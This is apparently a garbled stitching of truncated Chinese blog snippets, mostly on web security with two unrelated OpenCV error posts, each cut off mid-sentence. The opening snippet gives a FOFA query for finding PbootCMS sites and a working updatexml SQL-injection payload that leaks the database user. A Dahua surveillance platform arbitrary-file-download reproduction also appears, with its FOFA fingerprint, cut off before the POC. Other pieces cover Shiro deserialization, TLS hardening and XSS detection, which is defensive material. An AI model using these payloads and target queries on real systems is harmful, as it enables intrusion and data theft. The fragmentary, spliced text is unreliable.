漏洞描述i⭐PbootCMS搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息漏洞影响s✅PbootCMS空间测绘d⭕FOFA：app="PBOOTCMS"漏洞复现搜索框页面为✅Payload为/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)我的个人

前言一个阳光明媚的午休，我正惬意的喝着茶听着音乐，享受美好生活的时候，客户的QQ头像闪动了，原以为是出了什么新需求临时需要调整，没想到客户反馈的是平台出现了严重漏洞，不敢小视，抄起电脑开弄我根据客户给出的安全厂商反馈的问题，总结如下：1，Shiro反序列化漏洞2，提到了dnslog.cn平台了解Shiro反序列化漏洞参考官方的JIRA文档记录，https://issues.apache.org/jira/browse/SHIRO-550原因是Shiro的RememberMe出的问题官方也给出了问题的描述大概的意思就是：Shiro提供了RememberMe的功能，当用户关闭浏览器，下次再打开浏览

漏洞描述TLS1.0和TLS1.1协议使用了脆弱的加密算法，存在重大安全漏洞，容易受到降级攻击的严重影响。修复方案启用对TLS1.2或1.3的支持，并禁用对TLS1.0和TLS1.1的支持nginx修改配置文件ssl_protocolsTLSv1.2TLSv1.3;表示启用TLSv1.2TLSv1.3禁用其他TLS协议，注意此配置只能配置在http块或者default_server中才能生效，且其他server块都会读取default_server中的配置。验证配置是否正确nginx-t热加载使配置生效nginx-sreload验证openssls_client-connectXXXXX.co

反序列化漏洞0x01.序列化和反序列化是什么序列化：变量转换为可保存或传输的字符串的过程；反序列化：把序列化的字符串再转化成原来的变量使用作用：可轻松地存储和传输数据，使程序更具维护性0x02.为什么会有序列化序列化用于存储或传递PHP的值的过程中，同时不丢失其类型和结构0x03.序列化和反序列化代码示例classUser{public$username='admin';public$password='123456';}//序列化操作$user=newUser();$str_ser=serialize($user);echo"序列化结果为:\n";var_dump($str_ser);ech

大华城市安防监控系统平台管理存在任意文件下载漏洞1.大华城市安防监控系统平台管理存在任意文件下载漏洞1.1.漏洞描述1.2.漏洞影响1.3.FOFA2.漏洞复现2.1.登录页面2.2.抓包1.大华城市安防监控系统平台管理存在任意文件下载漏洞1.1.漏洞描述  大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。1.2.漏洞影响  大华城市安防监控系统平台管理1.3.FOFA  “attachment_downloadByUrlAtt.action”2.漏洞复现2.1.登录页面2.2.抓包  刷新登录页面进行抓包，然后在数据包中添加POC。POC：/por

问题由于等保的原因，被服务商扫描出漏洞。warnings:|64-bitblockcipher3DESvulnerabletoSWEET32attack漏洞复现$nmap-sV--scriptssl-enum-ciphers-p443xx.xxxxbac.comStartingNmap7.80(https://nmap.org)at2022-09-2710:54CSTNmapscanreportforxx.xxxxbac.com(120.77.xx.xx)Hostisup(0.0090slatency).PORTSTATESERVICEVERSION443/tcpopenssl/httpngi

管理安全漏洞并非易事，这不仅是因为漏洞可能很难被发现，还因为漏洞类型繁多。最新国家信息安全漏洞共享平台(CNVD)漏洞信息月度通报(2023年第5期)显示：“收集整理信息安全漏洞1581个，其中高危漏洞727个，中危漏洞746个，低危漏洞108个。上述漏洞中，可被利用来实施远程网络攻击的漏洞有1357个。”而幸运的是，相关工具和技术可以解决各种可能潜伏在技术栈任何一层的漏洞。什么是安全漏洞?安全漏洞是IT资源中可能被攻击者利用的错误或缺陷，其形式多种多样。安全漏洞可能是应用程序源代码中的一个编码错误，能够被用于发动缓冲区溢出攻击。它可能是开发人员的疏忽，忘记在应用程序中对输入内容妥当地进行验证

调用OpenCV模块的cvtColor处理图片：img_rgb=r'G:\手机照片2022\IMG_122440.jpg'img_gray=cv2.cvtColor(img_rgb,cv2.COLOR_BGR2GRAY)发生了报错，报错内容为：[WARN:0@0.011]globalD:\a\opencv-python\opencv-python\opencv\modules\imgcodecs\src\loadsave.cpp(239)cv::findDecoderimread_('G:\手机照片2022\IMG_122440.jpg'):can'topen/readfile:checkfi

整理了一些软件测试方面的资料、面试资料（接口自动化、web自动化、app自动化、性能安全、测试开发等），有需要的小伙伴可以文末加入我的学习交流qun，无套路自行领取~ 1.xss漏洞检测方法1：手动检测手工检测重点要考虑数据输入的地方，且需要清楚输入的数据输出到什么地方。在检测的开始，可以输入一些敏感字符，比如“、（）”等，提交后查看网页源代码的变化以发现输入被输出到什么地方，且可以发现相关敏感字符是否被过滤。手工检测结果相对准确，但效率较低。2.xss漏洞检测方法2：工具检测常用工具有AVWS（Acunetix Web Vulnerability Scanner）、BurpSuite等。还有

 将视频转化为图片出现的错误，我转化另外一种数据集没这样的错误我以为是路径有中文的原因，但是换了路径后还出现额外的错误我又将转化的图片格式换成png回到了原来的错误重新回到42行代码如果正好将视频分割的地方没有图像，那么就无法继续运行将39行修改 此时将一个边界的位置图像也能分割，我的想法就是分割的帧数正好处于一个边界，无图像的地方